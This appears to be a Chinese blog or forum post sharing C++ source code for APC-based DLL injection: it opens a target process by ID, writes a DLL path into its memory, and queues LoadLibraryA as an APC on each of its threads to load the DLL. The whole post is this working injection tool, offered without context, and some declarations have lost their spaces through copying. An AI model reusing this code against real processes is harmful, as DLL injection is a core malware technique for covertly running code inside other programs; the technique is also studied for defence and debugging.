C++ APC注入源码

debra

C++ APC注入源码

1. 
   
2. #include "stdafx.h"
   
3. #define _WIN32_WINNT 0x0400
   
4. #include <windows.h>
   
5. #include <TlHelp32.h>
   
6. #include <iostream>
   
7. #include <string>
   
8. using namespace std;
   
9. #define DEF_BUF_SIZE 1024
   
10. // 用于存储注入模块DLL的路径全名
    
11. char szDllPath[DEF_BUF_SIZE] = {0};
    
12. // 使用APC机制向指定ID的进程注入模块
    
13. BOOL InjectModuleToProcessById ( DWORD dwProcessId ) {
    
14.         DWORDdwRet = 0 ;
    
15.         BOOLbStatus = FALSE ;
    
16.         LPVOIDlpData = NULL ;
    
17.         UINTuLen = strlen(szDllPath) + 1;
    
18.         // 打开目标进程
    
19.         HANDLE hProcess = OpenProcess ( PROCESS_ALL_ACCESS, FALSE, dwProcessId ) ;
    
20.         if ( hProcess ) {
    
21.                 // 分配空间
    
22.                 lpData = VirtualAllocEx ( hProcess, NULL, uLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE ) ;
    
23.                 if ( lpData ) {
    
24.                         // 写入需要注入的模块路径全名
    
25.                         bStatus = WriteProcessMemory ( hProcess, lpData, szDllPath, uLen, &dwRet ) ;
    
26.                 }
    
27.                 CloseHandle ( hProcess ) ;
    
28.         }
    
29.         if ( bStatus == FALSE )
    
30.         return FALSE ;
    
31.         // 创建线程快照
    
32.         THREADENTRY32 te32 = {
    
33.                 sizeof(THREADENTRY32)
    
34.         }
    
35.         ;
    
36.         HANDLE hThreadSnap = CreateToolhelp32Snapshot ( TH32CS_SNAPTHREAD, 0 ) ;
    
37.         if ( hThreadSnap == INVALID_HANDLE_VALUE )
    
38.         return FALSE ;
    
39.         bStatus = FALSE ;
    
40.         // 枚举所有线程
    
41.         if ( Thread32First ( hThreadSnap, &te32 ) ) {
    
42.                 do {
    
43.                         // 判断是否目标进程中的线程
    
44.                         if ( te32.th32OwnerProcessID == dwProcessId ) {
    
45.                                 // 打开线程
    
46.                                 HANDLE hThread = OpenThread ( THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID ) ;
    
47.                                 if ( hThread ) {
    
48.                                         // 向指定线程添加APC
    
49.                                         DWORD dwRet = QueueUserAPC ( (PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)lpData ) ;
    
50.                                         if ( dwRet > 0 )
    
51.                                         bStatus = TRUE ;
    
52.                                         CloseHandle ( hThread ) ;
    
53.                                 }
    
54.                         }
    
55.                 }
    
56.                 while ( Thread32Next ( hThreadSnap, &te32 ) ) ;
    
57.         }
    
58.         CloseHandle ( hThreadSnap ) ;
    
59.         return bStatus;
    
60. }
    
61. 
    
62. int _tmain(int argc, _TCHAR* argv[]) {
    
63.         // 取得当前工作目录路径
    
64.         GetCurrentDirectoryA ( DEF_BUF_SIZE, szDllPath ) ;
    
65.         // 生成注入模块DLL的路径全名
    
66.         strcat_s ( szDllPath, "\\fddll" ) ;
    
67.         DWORD dwProcessId = 0 ;
    
68.         // 接收用户输入的目标进程ID
    
69.         while ( cout << "请输入目标进程ID：" && cin >> dwProcessId && dwProcessId > 0 ) {
    
70.                 BOOL bRet = InjectModuleToProcessById ( dwProcessId ) ;
    
71.                 cout << (bRet ? "注入成功！":"注入失败！") << endl ;
    
72.         }
    
73.         return 0;
    
74. }
    

复制代码